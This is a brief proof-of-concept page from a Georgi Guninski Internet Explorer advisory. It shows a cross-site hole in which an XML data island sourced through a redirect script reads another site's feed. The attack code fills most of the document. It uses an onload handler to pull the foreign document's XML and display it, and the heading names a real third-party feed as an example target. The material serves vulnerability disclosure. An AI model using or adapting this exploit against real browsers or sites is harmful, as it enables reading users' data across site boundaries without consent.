Yet another IE aperture by the Source -Georgi Guninski

get XSS from http://www.zeldman.com/feed/zeldman.xml

where_do_you_want_billg_to_go_today_1 Guninski site

<html>
    <script>
        function f()
        {
            alert(document.all.x1.XMLDocument.xml);
        }
    </script>

    <body onload="f()">
        <script id="x1" language="xml" src="redir.asp"></script>
        <h1>
            Copyright Georgi Guninski <br />
           
        </h1>
    </body>
</html>